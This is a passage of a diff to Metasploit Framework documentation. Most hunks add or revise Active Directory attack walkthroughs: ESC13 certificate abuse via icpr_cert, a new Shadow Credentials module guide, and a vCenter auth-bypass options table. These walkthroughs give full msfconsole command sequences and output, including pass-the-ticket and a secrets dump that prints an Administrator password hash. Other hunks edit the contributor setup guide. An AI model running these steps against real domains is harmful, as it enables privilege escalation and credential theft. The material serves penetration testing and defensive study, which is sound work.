 as the diagram notes above. This is because in ESC1, one has control over the
@@ -134,7 +155,9 @@ Domain Controller (DC), and will run a set of LDAP queries to gather a list of c
 templates they make available for enrollment. It will then also query the permissions on both the CA and the certificate template to figure out
 which users or groups can use that certificate template to elevate their privileges.

-At this time, the module is capable of identifying techniques ESC1 through ESC3.
+Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, and ESC13. The
+module is limited to checking for these techniques due to them being identifiable remotely from a normal user account by
+analyzing the objects in LDAP.

 Keep in mind though that there are two sets of permissions in play here though. There is one set of permissions on the CA server that control
 who is able to enroll in any certificate template from that server, and second set of permissions that control who is allowed to enroll in
@@ -858,6 +881,67 @@ msf6 auxiliary(admin/ldap/ad_cs_cert_template) >
 At this point the certificate template's configuration has been restored and the operator has a certificate that can be
 used to authenticate to Active Directory as the Domain Admin.

+# Exploiting ESC13
+To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active
+Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn't necessarily guaranteed to yield
+administrative privileges, rather the privileges that are gained are those of the group which is linked to by OID in the
+certificate template's issuance policy. The `auxiliary/gather/ldap_esc_vulnerable_cert_finder` module is capable of
+identifying certificates that meet the necessary criteria. When one is found, the module will include the group whose
+permissions will be included in the resulting Kerberos ticket in the notes section. In the following example, the
+ESC13-Test template is vulenerable to ESC13 and will yield a ticket including the ESC13-Group permissions.
+
+```
+msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
+...
+[*] Template: ESC13-Test
+[*]    Distinguished Name: CN=ESC13-Test,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=collalabs1,DC=local
+[*]    Vulnerable to: ESC13
+[*]    Notes: ESC13 groups: ESC13-Group
+[*]    Certificate Template Enrollment SIDs:
+[*]       * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
+[*]       * S-1-5-21-3474343397-3755413101-2031708755-513 (Domain Users)
+[*]       * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
+[*]    Issuing CAs:
+[*]       * collalabs1-SRV-ADDS01-CA
+[*]          Server: SRV-ADDS01.collalabs1.local
+[*]          Enrollment SIDs:
+[*]             * S-1-5-11 (Authenticated Users)
+[*]             * S-1-5-21-3474343397-3755413101-2031708755-519 (Enterprise Admins)
+[*]             * S-1-5-21-3474343397-3755413101-2031708755-512 (Domain Admins)
+```
+
+In this case, the ticket can be issued with the `icpr_cert` module. No additional options are required to issue the
+certificate beyond the standard `CA`, `CERT_TEMPLATE`, target and authentication options.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
+SMBDomain => COLLALABS1
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
+CA => collalabs1-SRV-ADDS01-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC13-Test
+CERT_TEMPLATE => ESC13-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate Email: normaluser@collalabs1.local
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3474343397-3755413101-2031708755-10051
+[*] 172.30.239.85:445 - Certificate UPN: normaluser@collalabs1.local
+[*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20240226170310_default_172.30.239.85_windows.ad.cs_917878.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) with the `ESC13-Group`
+RID present in the Groups field of the TGT PAC.
+
 # Authenticating With A Certificate
 Metasploit supports authenticating with certificates in a couple of different ways. These techniques can be used to take
 further actions once a certificate has been issued for a particular identity (such as a Domain Admin user).
@@ -22,7 +22,7 @@ This guide has details for setting up both **Linux** and **Windows**.

 ### Linux

-1. Open a terminal on your Linux host and set up Git, build tools, and Ruby dependencies:
+* Open a terminal on your Linux host and set up Git, build tools, and Ruby dependencies:

 ```bash
 sudo apt update && sudo apt install -y git autoconf build-essential libpcap-dev libpq-dev zlib1g-dev libsqlite3-dev
@@ -32,9 +32,9 @@ sudo apt update && sudo apt install -y git autoconf build-essential libpcap-dev

 If you are running a Windows machine

-1. Install [chocolatey](https://chocolatey.org/)
-2. Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.0.3-1/rubyinstaller-devkit-3.0.3-1-x64.exe)
-3. Install pcaprub dependencies from your cmd.exe terminal:
+* Install [chocolatey](https://chocolatey.org/)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.0.3-1/rubyinstaller-devkit-3.0.3-1-x64.exe)
+* Install pcaprub dependencies from your cmd.exe terminal:

 ```
 powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
@@ -43,7 +43,7 @@ choco install 7zip
 7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
 ```

-4. Install a version of PostgreSQL:
+Install a version of PostgreSQL:

 ```
 choco install postgresql12
@@ -53,9 +53,8 @@ choco install postgresql12

 You will need to use Github to create a fork for your contributions and receive the latest updates from our repository.

-1. Login to Github and click the "Fork" button in the top-right corner of the [metasploit-framework] repository.
-
-2.  Create a `git` directory in your home folder and clone your fork to your local machine:
+* Login to Github and click the "Fork" button in the top-right corner of the [metasploit-framework] repository.
+* Create a `git` directory in your home folder and clone your fork to your local machine:

 ```bash
 export GITHUB_USERNAME=YOUR_USERNAME_FOR_GITHUB
@@ -66,9 +65,8 @@ git clone git@github.com:$GITHUB_USERNAME/metasploit-framework
 cd ~/git/metasploit-framework
 ```

-3. If you encounter a "permission denied" error on the above command, research the error message.  If there isn't an explicit reason given, confirm that your [Github SSH key is configured correctly][github-ssh-instructions]. You will need to associate your [public SSH key][ssh-key] with your GitHub account, otherwise if you set up a SSH key and don't associate it with your GitHub account, you will receive this "permission denied" error.
-
-4. To receive updates, you will create an `upstream-master` branch to track the Rapid7 remote repository, alongside your `master` branch which will point to your personal repository's fork:
+* If you encounter a "permission denied" error on the above command, research the error message.  If there isn't an explicit reason given, confirm that your [Github SSH key is configured correctly][github-ssh-instructions]. You will need to associate your [public SSH key][ssh-key] with your GitHub account, otherwise if you set up a SSH key and don't associate it with your GitHub account, you will receive this "permission denied" error.
+* To receive updates, you will create an `upstream-master` branch to track the Rapid7 remote repository, alongside your `master` branch which will point to your personal repository's fork:

 ```bash
 git remote add upstream git@github.com:rapid7/metasploit-framework.git
@@ -76,7 +74,7 @@ git fetch upstream
 git checkout -b upstream-master --track upstream/master
 ```

-5. Configure your Github username, email address, and username.  Ensure your `user.email` matches the email address you registered with your Github account.
+* Configure your Github username, email address, and username.  Ensure your `user.email` matches the email address you registered with your Github account.

 ```bash
 git config --global user.name "$GITHUB_USERNAME"
@@ -84,7 +82,7 @@ git config --global user.email "$GITHUB_EMAIL"
 git config --global github.user "$GITHUB_USERNAME"
 ```

-6. Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+* Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:

 ```bash
 cd ~/git/metasploit-framework
@@ -129,27 +127,60 @@ Congratulations! You have now set up a development environment and the latest ve

 ## Optional: Set up the REST API and PostgreSQL database

-The following optional section describes how to manually install PostgreSQL and set up the Metasploit database.  Alternatively, use our Omnibus installer which handles this more reliably.
+Installing the REST API and PostgreSQL is optional, and can be done in two ways.
+Recommended is to use the Docker approach, and fairly simple to do once you have docker installed on your
+system, [Docker Desktop][docker-desktop] is recommended, but not mandatory.
+On Linux systems, simply having docker-cli is sufficient.

-1. Confirm that the PostgreSQL server and client are installed:
+### Docker Installation
+
+**Make sure, you have docker available on your system: [Docker Installation Guide][docker-installation]**
+
+**Note**: Depending on your environment, these commands might require `sudo`
+
+* Start the postgres container:
+
+```bash
+docker run --rm -it -p 127.0.0.1:5433:5432 -e POSTGRES_PASSWORD="mysecretpassword" postgres:14
+```
+
+Wait till the postgres container is fully running.
+
+* Configure the Metasploit database:
+
+```
+cd ~/git/metasploit-framework
+./msfdb init --connection-string="postgres://postgres:mysecretpassword@127.0.0.1:5433/postgres"
+```
+
+* If the `msfdb init` command succeeds, then confirm that the database is accessible to Metasploit:
+
+```bash
+$ ./msfconsole -qx "db_status; exit"
+```
+
+### Manual Installation
+
+The following optional section describes how to manually install PostgreSQL and set up the Metasploit database.
+Alternatively, use our Omnibus installer which handles this more reliably.
+
+* Confirm that the PostgreSQL server and client are installed:

 ```bash
 sudo apt update && sudo apt-get install -y postgresql postgresql-client
 sudo service postgresql start && sudo update-rc.d postgresql enable
 ```

-2. Ensure that you are not running as the root user.
-
-3. Initialize the Metasploit database:
+* Ensure that you are not running as the root user.
+* Initialize the Metasploit database:

 ```bash
 cd ~/git/metasploit-framework
 ./msfdb init
 ```

-4. If you receive an error about a component not being installed, confirm that the binaries shown are in your path using the [which] and [find] commands, then modifying your [$PATH] environment variable.  If it was something else, open a [new issue] to let us know what happened.
-
-5. If the `msfdb init` command succeeds, then confirm that the database is accessible to Metasploit:
+* If you receive an error about a component not being installed, confirm that the binaries shown are in your path using the [which] and [find] commands, then modifying your [$PATH] environment variable.  If it was something else, open a [new issue] to let us know what happened.
+* If the `msfdb init` command succeeds, then confirm that the database is accessible to Metasploit:

 ```bash
 $ ./msfconsole -qx "db_status; exit"
@@ -202,13 +233,33 @@ git fetch upstream
 git checkout fixes-to-pr-12345 upstream/pr/12345
 ```

-If you're writing test cases (which you should), then make sure [rspec] works:
+## Running and writing tests
+
+If you're writing test cases (which you should), you should first configure your local database:

 ```bash
-rake spec
+bundle exec rake db:create db:migrate db:seed RAILS_ENV=test
 ```

-You should see over 9000 tests run, mostly resulting in green dots, a few in yellow stars, and no red errors.
+Then make sure [rspec] works:
+
+```bash
+bundle exec rspec
+```
+
+To run tests defined in file(s):
+
+```bash
+bundle exec rspec ./spec/path/to/your/tests_1.rb ./spec/path/to/your/tests_2.rb
+```
+
+To run the tests defined at a line number - for instance line 23:
+
+```
+bundle exec rspec ./spec/path/to/your/tests_1.rb:23
+```
+
+Newly contributed tests should follow the conventions defined by [BetterSpecs.org] - with the additional requirement that all `it` blocks should have a human readable description.

 # Great!  Now what?

@@ -250,3 +301,7 @@ Finally, we welcome your feedback on this guide, so feel free to reach out to us
 [@kernelsmith]:https://github.com/kernelsmith
 [@corelanc0d3r]:https://github.com/corelanc0d3r
 [@ffmike]:https://github.com/ffmike
+
+[BetterSpecs.org]:https://www.betterspecs.org/
+[docker-desktop]:https://www.docker.com/products/docker-desktop/
+[docker-installation]:https://www.docker.com/get-started/
@@ -106,5 +106,5 @@ sequenceDiagram
 - AS-REP Roasting - Some Kerberos accounts may be configured with a `Do not require Kerberos preauthentication` flag. For these accounts a Kerberos TGT will be returned by the KDC without needing to authenticate. These TGTs can be bruteforced to learn the original user's credentials. The [[auxiliary/scanner/kerberos/kerberos_login|pentesting/active-directory/kerberos/kerberos_login.md#asreproasting]] module implements this workflow.
 - Forging Tickets - After compromising a KDC or service account it is possible to forge tickets for persistence. The [[auxiliary/admin/kerberos/forge_ticket|pentesting/active-directory/kerberos/forge_ticket.md]] module can forge both Golden and Silver tickets.
 - Inspecting Tickets - Kerberos tickets can be inspected with the [[auxiliary/admin/kerberos/inspect_ticket|pentesting/active-directory/kerberos/inspect_ticket.md]] module. If the encryption key is known, the decrypted contents can be displayed.
- [[Service authentication|kerberos/service_authentication.md]] - Using Kerberos to authenticate via services suh as WinRM/Microsoft SQL Server/SMB/LDAP/etc
+- [[Service authentication|kerberos/service_authentication.md]] - Using Kerberos to authenticate via services such as WinRM/Microsoft SQL Server/SMB/LDAP/etc
 - [[Kerberoasting|kerberos/kerberoasting.md]] - Finding services in Active Directory that are associated with normal user accounts which may have brute forcible encryption keys that lead to Active Directory credentials.
@@ -325,6 +325,9 @@ NAVIGATION_CONFIG = [
          {
            path: 'Metasploit-Web-Service.md'
          },
+          {
+            path: 'How-to-Configure-DNS.md'
+          },
          {
            title: 'Meterpreter',
            folder: 'meterpreter',
@@ -3,6 +3,8 @@ Request certificates via MS-ICPR (Active Directory Certificate Services). Depend
 template's configuration the resulting certificate can be used for various operations such as authentication.
 PFX certificate files that are saved are encrypted with a blank password.

+This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13.
+
 ## Module usage 

 1. From msfconsole
@@ -1,9 +1,13 @@
-## RBCD Exploitation
+## AD CS Certificate Template Exploitation

 This module can read, write, update, and delete AD CS certificate templates from a Active Directory Domain Controller.

-The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be restored using
-the CREATE or UPDATE actions.
+The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be
+restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data
+file to be specified to define the attributes. Template data files are provided to create a template that is
+vulnerable to ESC1, ESC2, and ESC3.
+
+This module is capable of exploiting ESC4.

 In order for the `auxiliary/admin/ldap/ad_cs_cert_template` module to succeed, the authenticated user must have the 
 necessary permissions to perform the specified action on the target object (the certificate specified in
@@ -160,7 +160,7 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > run
 msf6 auxiliary(admin/dcerpc/samr_computer) > use auxiliary/admin/ldap/rbcd
 ```

-Now use the RBCD module to read the the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:
+Now use the RBCD module to read the current value of `msDS-AllowedToActOnBehalfOfOtherIdentity`:

 ```msf
 msf6 auxiliary(admin/ldap/rbcd) > set USERNAME sandy@msflab.local
@@ -0,0 +1,264 @@
+## Shadow Credentials Exploitation
+
+If an account has the ability to write to the `msDS-KeyCredentialLink` attribute against a target, this can be abused for privilege escalation.
+This situation exists when a user contains the `GenericWrite` permission over another account. In addition, by default, Computer accounts have 
+the ability to write their own value (whereas user accounts do not).
+
+The `auxiliary/admin/ldap/shadow_credentials` module can be used to read and write the `msDS-KeyCredentialLink` LDAP attribute against a target.
+When writing, the module will append a KeyCredential blob to this LDAP attribute, and write a certificate file (`pfx`) to disk. This `pfx` file
+can then be used to authenticate as the account using PKINIT (the `auxiliary/admin/kerberos/get_ticket` module), as long as Certificate Services
+are enabled within the domain.
+
+## Lab setup
+
+Set up a domain with AD CS configured.
+
+For the Shadow Credentials attack to work, an Active Directory account (e.g. `sandy`) is required with write privileges to the target account (i.e. `victim`).
+Alternatively, Computer accounts should be able to modify this value for their own account, with some limitations (described below).
+
+From an admin powershell prompt, first create a new Active Directory account, `sandy`, in your Active Directory environment:
+
+```powershell
+# Create a basic user account
+net user /add sandy Password1!
+
+# Mark the sandy and password as never expiring, to ensure the lab setup still works in the future
+net user sandy /expires:never
+Set-AdUser -Identity sandy -PasswordNeverExpires:$true
+```
+
+Grant Write privileges for sandy to the target account, i.e. `victim`:
+
+```powershell
+# Remember to change victim to the name of your target user
+$TargetUser = Get-ADUser 'victim'
+$User = Get-ADUser 'sandy'
+
+# Add GenericWrite access to the user against the target computer
+$Rights = [System.DirectoryServices.ActiveDirectoryRights] "GenericWrite"
+$ControlType = [System.Security.AccessControl.AccessControlType] "Allow"
+$InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All"
+$GenericWriteAce = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $User.Sid,$Rights,$ControlType,$InheritanceType
+$TargetUserAcl = Get-Acl "AD:$($TargetUser.DistinguishedName)"
+$TargetUserAcl.AddAccessRule($GenericWriteAce)
+Set-Acl -AclObject $TargetUserAcl -Path "AD:$($TargetUser.DistinguishedName)"
+```
+
+Finally Verify the Write privileges for the sandy account:
+
+```powershell
+PS C:\Users\administrator> $TargetUser = Get-ADUser 'victim'
+PS C:\Users\administrator> (Get-ACL "AD:$($TargetUser.DistinguishedName)").Access| Where-Object { $_.IdentityReference -Match 'sandy' }
+
+ActiveDirectoryRights : GenericWrite
+InheritanceType       : All
+ObjectType            : 00000000-0000-0000-0000-000000000000
+InheritedObjectType   : 00000000-0000-0000-0000-000000000000
+ObjectFlags           : None
+AccessControlType     : Allow
+IdentityReference     : MSFLAB\sandy
+IsInherited           : False
+InheritanceFlags      : ContainerInherit
+PropagationFlags      : None
+```
+
+## Module usage
+1. `use auxiliary/admin/ldap/shadow_credentials`
+2. Set the `RHOST` value to a target domain controller
+3. Set the `USERNAME` and `PASSWORD` information to an account with the necessary privileges
+4. Set the `TARGET_USER` to the victim account
+5. Use the `ADD` action to add a credential entry to the victim account
+
+See the Scenarios for a more detailed walk through
+
+## Actions
+
+### FLUSH
+Delete *all* credential entries. Unlike the REMOVE action, this deletes the entire property instead of just
+the matching device IDs. Use with caution, as any existing entries may be relied upon by legitimate users.
+
+### LIST
+Read the credential entries and print the Device (Certificate) IDs of currently configured entries
+
+### REMOVE
+Remove matching certificates from the `msDS-KeyCredentialLink` property. Unlike the FLUSH action, this only removes the matching Device (Certificate) ID
+instead of deleting the entire property.
+
+### ADD
+Add a certificate entry to the `msDS-KeyCredentialLink` property. The new entry will be appended to the end of the existing set of values.
+
+## Options
+
+### TARGET_USER
+The user (or computer) account being targeted. This is the object whose Key Credential property is the target of the ACTION
+(read, write, etc.). The authenticated user must have the appropriate access to this object.
+
+### DEVICE_ID
+The certificate ID to delete when using the `REMOVE` action. You can retrieve Certificate IDs for a user account by using the `LIST` action.
+
+## Scenarios
+
+### Window Server 2022 Domain Controller, Targeting user account
+
+In the following example the user `MSF\sandy` has write access to the user account `victim`. We will start the attack using the `admin/ldap/shadow_credentials` module.
+
+```msf
+msf6 auxiliary(admin/ldap/shadow_credentials) > show options
+
+Module options (auxiliary/admin/ldap/shadow_credentials):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   DOMAIN                        no        The domain to authenticate to
+   PASSWORD                      no        The password to authenticate with
+   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        389              yes       The target port
+   SSL          false            no        Enable SSL on the LDAP connection
+   TARGET_USER                   yes       The target to write to
+   USERNAME                      no        The username to authenticate with
+
+
+   When ACTION is REMOVE:
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   DEVICE_ID                   no        The specific certificate ID to operate on
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   LIST  Read all credentials associated with the account
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/ldap/shadow_credentials) > set rhosts 20.92.148.129
+rhosts => 20.92.148.129
+msf6 auxiliary(admin/ldap/shadow_credentials) > set domain MSF.LOCAL
+domain => MSF.LOCAL
+msf6 auxiliary(admin/ldap/shadow_credentials) > set username sandy
+username => sandy
+msf6 auxiliary(admin/ldap/shadow_credentials) > set password Password1!
+password => Password1!
+msf6 auxiliary(admin/ldap/shadow_credentials) > set target_user victim
+target_user => victim
+msf6 auxiliary(admin/ldap/shadow_credentials) > set action add
+action => add
+msf6 auxiliary(admin/ldap/shadow_credentials) > run
+[*] Running module against 20.92.148.129
+
+[*] Discovering base DN automatically
+[+] 20.92.148.129:389 Discovered base DN: DC=msf,DC=local
+[*] Certificate stored at: /home/user/.msf4/loot/20240404115740_default_20.92.148.129_windows.ad.cs_300384.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 8a75b35e-f4d9-4469-49aa-3f0bfc692f07
+[*] Auxiliary module execution completed
+```
+
+The LDAP property has been successfully updated. Now we can request a TGT using the `get_ticket` module.
+
+
+```msf
+msf6 auxiliary(admin/kerberos/get_ticket) > set rhosts 20.92.148.129
+rhosts => 20.92.148.129
+msf6 auxiliary(admin/kerberos/get_ticket) > set username victim
+username => victim
+msf6 auxiliary(admin/kerberos/get_ticket) > set domain MSF.LOCAL
+domain => MSF.LOCAL
+msf6 auxiliary(admin/kerberos/get_ticket) > set cert_file /home/user/.msf4/loot/20240404115740_default_20.92.148.129_windows.ad.cs_300384.pfx
+cert_file => /home/user/.msf4/loot/20240404115740_default_20.92.148.129_windows.ad.cs_300384.pfx
+msf6 auxiliary(admin/kerberos/get_ticket) > run
+[*] Running module against 20.92.148.129
+
+[!] Warning: Provided principal and realm (victim@MSF.LOCAL) do not match entries in certificate:
+[*] 20.92.148.129:88 - Getting TGT for victim@MSF.LOCAL
+[+] 20.92.148.129:88 - Received a valid TGT-Response
+[*] 20.92.148.129:88 - TGT MIT Credential Cache ticket saved to /home/user/.msf4/loot/20240404120020_default_20.92.148.129_mit.kerberos.cca_046023.bin
+[*] Auxiliary module execution completed
+```
+
+The saved TGT can be used in a pass-the-ticket style attack. For instance using the `auxiliary/gather/windows_secrets_dump` module:
+
+```msf
+msf6 auxiliary(gather/windows_secrets_dump) > run smb::auth=kerberos smb::rhostname=dc22 smbuser=victim smbdomain=msf.local rhost=20.92.148.129 domaincontrollerrhost=20.92.148.129
+[*] Running module against 20.92.148.129
+
+[*] 20.92.148.129:445 - Using cached credential for krbtgt/MSF.LOCAL@MSF.LOCAL victim@MSF.LOCAL
+[+] 20.92.148.129:445 - 20.92.148.129:88 - Received a valid TGS-Response
+[*] 20.92.148.129:445 - 20.92.148.129:445 - TGS MIT Credential Cache ticket saved to /home/user/.msf4/loot/20240404121510_default_20.92.148.129_mit.kerberos.cca_449355.bin
+[+] 20.92.148.129:445 - 20.92.148.129:88 - Received a valid delegation TGS-Response
+[*] 20.92.148.129:445 - Service RemoteRegistry is already running
+[*] 20.92.148.129:445 - Retrieving target system bootKey
+[+] 20.92.148.129:445 - bootKey: 0x019e09099ae1ec55560bc1e7f9414919
+[*] 20.92.148.129:445 - Saving remote SAM database
+[*] 20.92.148.129:445 - Dumping SAM hashes
+[*] 20.92.148.129:445 - Password hints:
+No users with password hints on this system
+[*] 20.92.148.129:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
+Administrator:500:aad3b435b51404eeaad3b435b51404ee:26f8220ed7f1494c5737bd552e661f89:::
+```
+
+### Window Server 2022 Domain Controller, Computer account targeting itself
+
+In the following example the user `MSF\DESKTOP-H4VEQQHQ$` targets itself. No special permissions are required for this, as computers have some ability to modify their own value by default.
+
+```msf
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
+[*] Running module against 20.92.148.129
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 20.92.148.129:389 Getting root DSE
+[+] 20.92.148.129:389 Discovered base DN: DC=msf,DC=local
+[*] Certificate stored at: /home/user/.msf4/loot/20240404122017_default_20.92.148.129_windows.ad.cs_502988.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID ff946afc-a94a-f9c5-7229-861bb9ee4709
+[*] Auxiliary module execution completed
+```
+
+Note, however, that attempting to add a second credential will fail under these circumstances:
+
+```msf
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
+[*] Running module against 20.92.148.129
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 20.92.148.129:389 Getting root DSE
+[+] 20.92.148.129:389 Discovered base DN: DC=msf,DC=local
+[!] By default, computer accounts can only update their key credentials if no value already exists. If there is already a value present, you can remove it, and add your own, but any users relying on the existing credentials will not be able to authenticate until you replace the existing value(s).
+[-] Failed to update the msDS-KeyCredentialLink attribute.
+[-] Auxiliary aborted due to failure: no-access: The LDAP operation failed due to insufficient access rights.
+[*] Auxiliary module execution completed
+```
+
+This is because computer accounts only have permission to modify their own `msDS-KeyCredentialLink` property if it does not already have a value.
+It is possible to circumvent this by first entirely removing the existing value, and then adding a new one. Note that this will break authentication
+for any legitimate user relying on the existing value.
+
+```msf
+msf6 auxiliary(admin/ldap/shadow_credentials) > set action flush
+action => flush
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
+[*] Running module against 20.92.148.129
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 20.92.148.129:389 Getting root DSE
+[+] 20.92.148.129:389 Discovered base DN: DC=msf,DC=local
+[+] Successfully deleted the msDS-KeyCredentialLink attribute.
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/ldap/shadow_credentials) > set action add
+action => add
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
+[*] Running module against 20.92.148.129
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[*] 20.92.148.129:389 Getting root DSE
+[+] 20.92.148.129:389 Discovered base DN: DC=msf,DC=local
+[*] Certificate stored at: /home/user/.msf4/loot/20240404122240_default_20.92.148.129_windows.ad.cs_785877.pfx
+[+] Successfully updated the msDS-KeyCredentialLink attribute; certificate with device ID 1107833b-0eb6-0477-a7c6-3590b326851a
+[*] Auxiliary module execution completed
+```
@@ -60,14 +60,17 @@ msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options

 Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):

-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   BASE_DN                    no        LDAP base DN if you already have it
-   NEW_PASSWORD               no        Password of admin user to add
-   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT     636              yes       The target port
-   SSL       true             no        Enable SSL on the LDAP connection
-   NEW_USERNAME               no        Username of admin user to add
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   BASE_DN                        no        LDAP base DN if you already have it
+   DOMAIN                         no        The domain to authenticate to
+   NEW_PASSWORD                   no        Password of admin user to add
+   NEW_USERNAME                   no        Username of admin user to add
+   PASSWORD                       no        The password to authenticate with
+   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         636              yes       The target port
+   SSL           true             no        Enable SSL on the LDAP connection
+   USERNAME                       no        The username to authenticate with


 Auxiliary action:
@@ -0,0 +1,84 @@
+## Vulnerable Application
+
+This module reads or writes a Windows registry security descriptor remotely.
+
+In READ mode, the `FILE` option can be set to specify where the security
+descriptor should be written to.
+
+The following format is used:
+```
+key: <registry key>
+security_info: <security information>
+sd: <security descriptor as a hex string>
+```
+
+In WRITE mode, the `FILE` option can be used to specify the information needed
+to write the security descriptor to the remote registry. The file must follow
+the same format as described above.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use auxiliary/admin/registry_security_descriptor`
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key>`
+1. **Verify** the registry key security descriptor is displayed
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key> file=<file path>`
+1. **Verify** the registry key security descriptor is saved to the file
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> key=<registry key> action=write sd=<security descriptor as a hex string>`
+1. **Verify** the security descriptor is correctly set on the given registry key
+1. Do: `run verbose=true rhost=<host> smbuser=<username> smbpass=<password> file=<file path>`
+1. **Verify** the security descriptor taken from the file is correctly set on the given registry key
+
+## Options
+
+### KEY
+Registry key to read or write.
+
+### SD
+Security Descriptor to write as a hex string.
+
+### SECURITY_INFORMATION
+Security Information to read or write (see
+https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/23e75ca3-98fd-4396-84e5-86cd9d40d343
+(default: OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION).
+
+### FILE
+File path to store the security descriptor when reading or source file path used to write the security descriptor when writing
+
+
+## Scenarios
+
+### Read against Windows Server 2019
+
+```
+msf6 auxiliary(admin/registry_security_descriptor) > run verbose=true rhost=192.168.101.124 smbuser=Administrator smbpass=123456 action=READ key='HKLM\SECURITY\Policy\PolEKList'
+[*] Running module against 192.168.101.124
+
+[+] 192.168.101.124:445 - Raw security descriptor for HKLM\SECURITY\Policy\PolEKList: 01000480480000005800000000000000140000000200340002000000000214003f000f0001010000000000051200000000021800000006000102000000000005200000002002000001020000000000052000000020020000010100000000000512000000
+[*] Auxiliary module execution completed
+```
+
+### Write against Windows Server 2019
+Note that the information security has been set to 4 (DACL_SECURITY_INFORMATION) to avoid an access denied error.
+
+```
